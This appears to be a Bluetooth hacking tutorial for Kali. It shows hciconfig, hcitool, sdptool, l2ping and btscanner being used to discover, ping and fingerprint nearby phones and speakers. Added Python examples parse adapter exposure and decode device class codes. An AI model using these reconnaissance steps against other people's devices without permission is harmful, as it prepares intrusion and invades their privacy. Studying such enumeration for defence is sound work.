Let's start by firing up Kali and opening a command prompt. I hope it goes without saying that you need a Linux-compatible Bluetooth adapter to continue from here.




Use Hciconfig to Enable Your Bluetooth Adapter

The first step is to check whether our Bluetooth adapter is recognized and enabled. We can do this with a built-in BlueZ tool called hciconfig:


Type

 hciconfig





As you can see in this screenshot, we do have a Bluetooth adapter that has a MAC address of 10:AE:60:58:F1:37. The Bluetooth stack has named it "hci0." Now, let's make certain it is up and enabled:



hciconfig hci0 up





Good, hci0 is up and ready to work!
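The same hciconfig output is useful to a defender: since the attack described above only needs Bluetooth to be turned on, any adapter that is UP is worth recording, and the PSCAN and ISCAN flags show whether it accepts connections or answers discovery scans. The following is an added example, not part of the original post; the sample output is constructed and the exposure labels are this example's own naming.

```python
import re

# Constructed sample in the layout `hciconfig` prints; not captured from a real host.
SAMPLE = (
    "hci0:\tType: Primary  Bus: USB\n"
    "\tBD Address: 10:AE:60:58:F1:37  ACL MTU: 1021:8  SCO MTU: 64:1\n"
    "\tUP RUNNING PSCAN ISCAN \n"
    "\tRX bytes:1226 acl:0 sco:0 events:64 errors:0\n"
    "\n"
    "hci1:\tType: Primary  Bus: UART\n"
    "\tBD Address: AA:BB:CC:DD:EE:FF  ACL MTU: 1021:8  SCO MTU: 64:1\n"
    "\tDOWN \n"
    "\tRX bytes:0 acl:0 sco:0 events:0 errors:0\n"
)


def audit_adapters(hciconfig_text):
    """Parse hciconfig output and label each adapter's radio exposure."""
    records, current = [], None
    for line in hciconfig_text.splitlines():
        head = re.match(r"(hci\d+):", line)
        if head:
            current = {"name": head.group(1), "address": None, "flags": set()}
            records.append(current)
            continue
        if current is None:
            continue
        body = line.strip()
        addr = re.match(r"BD Address: ((?:[0-9A-F]{2}:){5}[0-9A-F]{2})", body)
        if addr:
            current["address"] = addr.group(1)
        elif re.fullmatch(r"[A-Z]+(?: [A-Z]+)*", body):
            current["flags"] = set(body.split())  # e.g. UP RUNNING PSCAN ISCAN
    for rec in records:
        flags = rec["flags"]
        if "UP" not in flags:
            rec["exposure"] = "off"            # radio down: not reachable
        elif "ISCAN" in flags:
            rec["exposure"] = "discoverable"   # answers inquiry scans
        elif "PSCAN" in flags:
            rec["exposure"] = "connectable"    # hidden, but accepts connections
        else:
            rec["exposure"] = "up-not-scanning"
    return records


if __name__ == "__main__":
    for rec in audit_adapters(SAMPLE):
        print(rec["name"], rec["address"], rec["exposure"])
```

On a real host, feed it the text printed by hciconfig instead of SAMPLE.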




Scan for Bluetooth Devices with Hcitool


The BlueZ stack also has some excellent command line (CLI) tools for scanning for Bluetooth devices. These are located in hcitool. Let's first use the scanning portion of this tool to look for Bluetooth devices that are sending out their discovery beacons (in discovery mode). Type:

 hcitool scan







In the screenshot above, you can see it found two devices, ANDROID BT and SCH-I535. Now, let's try the inquiry (inq) command in hcitool to garner more information about these devices:



hcitool inq







Note that it also displays clock offset and the class. The class indicates what type of Bluetooth device it is, and we can look up the code by going to the Service Discovery webpage on the Bluetooth SIG site to see what type of device it is. Or, as we will see later, some tools will do this for us.
Hcitool is a powerful command line interface to the Bluetooth stack that can do many, many things. In the screenshot below, you can see some of the commands that it can execute. Many of the Bluetooth-hacking tools that we will be using in future tutorials simply use these commands in a script. You can easily create your own tool by using these commands in your own script.



Scan for Services with Sdptool




Service discovery protocol (SDP) is a Bluetooth protocol for searching for services. BlueZ has a tool called sdptool that is capable of browsing a device for the services it provides. We can use it by typing:


sdptool browse <MAC Address>

Here we can see that this tool was able to pull information on all the services this device is capable of using.


See if They Are Reachable with L2ping



Now that we have the MAC addresses of all the nearby devices, we can ping them, whether they are in discover mode or not, to see whether they are in reach.

 l2ping <MAC address>







This indicates that the device with the MAC address 76:6F:46:65:72:67 is within range and reachable.




Scan for Bluetooth Devices with BTScanner



For those of you who are more comfortable with a GUI-based tool, Kali has BTScanner. Simply type:


btscanner

When you type in BTScanner, it opens a rudimentary GUI interface with commands along the bottom. To do an inquiry scan, simply type the letter "i" on your keyboard. In this case, BTScanner found the two that I found with hcitool, as well as an additional one, MINIJAMBOX.





To gather more information about the device, simply place the cursor over the device and hit Enter on your keyboard. It will then display all of the information it has gathered about the device, similar to sdptool.







In this case, this is the information about the SCH-I535 device. Notice about a third of the way down the screen, under class, it identifies it as a "Phone/Smart phone" from its class number, 0x5a020c.
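The class number that hcitool inq and BTScanner report is a 24-bit Class of Device field, and it can be decoded without looking it up by hand, which helps when building an inventory of the Bluetooth devices in your own environment. This added example (not from the original post) decodes 0x5a020c using the standard Class of Device bit layout; only the Computer and Phone minor classes are listed, and the inquiry line is constructed.

```python
import re

# Major and minor device classes and service bits from the Bluetooth
# Assigned Numbers "Class of Device" layout (only Computer/Phone minors listed).
MAJOR = {0x00: "Miscellaneous", 0x01: "Computer", 0x02: "Phone",
         0x03: "LAN/Network Access Point", 0x04: "Audio/Video",
         0x05: "Peripheral", 0x06: "Imaging", 0x07: "Wearable",
         0x08: "Toy", 0x09: "Health", 0x1F: "Uncategorized"}
MINOR = {
    0x01: {0: "Uncategorized", 1: "Desktop workstation", 2: "Server-class computer",
           3: "Laptop", 4: "Handheld PC/PDA", 5: "Palm-size PC/PDA",
           6: "Wearable computer", 7: "Tablet"},
    0x02: {0: "Uncategorized", 1: "Cellular", 2: "Cordless", 3: "Smartphone",
           4: "Wired modem or voice gateway", 5: "Common ISDN access"},
}
SERVICES = {13: "Limited Discoverable Mode", 16: "Positioning", 17: "Networking",
            18: "Rendering", 19: "Capturing", 20: "Object Transfer",
            21: "Audio", 22: "Telephony", 23: "Information"}


def decode_cod(cod):
    """Split a 24-bit Class of Device value into major, minor and services."""
    if isinstance(cod, str):
        cod = int(cod, 16)
    if not 0 <= cod <= 0xFFFFFF:
        raise ValueError("Class of Device is a 24-bit field")
    if cod & 0b11:
        raise ValueError("unsupported CoD format type")
    major_id = (cod >> 8) & 0x1F    # bits 8-12
    minor_id = (cod >> 2) & 0x3F    # bits 2-7, meaning depends on the major class
    return {
        "major": MAJOR.get(major_id, "Reserved (0x%02x)" % major_id),
        "minor": MINOR.get(major_id, {}).get(minor_id, "minor 0x%02x" % minor_id),
        "services": [n for b, n in sorted(SERVICES.items()) if cod & (1 << b)],
    }


# Constructed line in the layout `hcitool inq` prints (address and offset invented).
SAMPLE_INQ = "\tAA:BB:CC:DD:EE:FF\tclock offset: 0x1c93\tclass: 0x5a020c"


def decode_inquiry_line(line):
    """Return address plus decoded class for one `hcitool inq` result line."""
    m = re.search(r"((?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}).*?class:\s*(0x[0-9A-Fa-f]+)", line)
    if m is None:
        return None
    return {"address": m.group(1).upper(), **decode_cod(m.group(2))}
```

For 0x5a020c this gives major class Phone, minor class Smartphone, and the Networking, Capturing, Object Transfer and Telephony service bits, matching the "Phone/Smart phone" label BTScanner shows.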
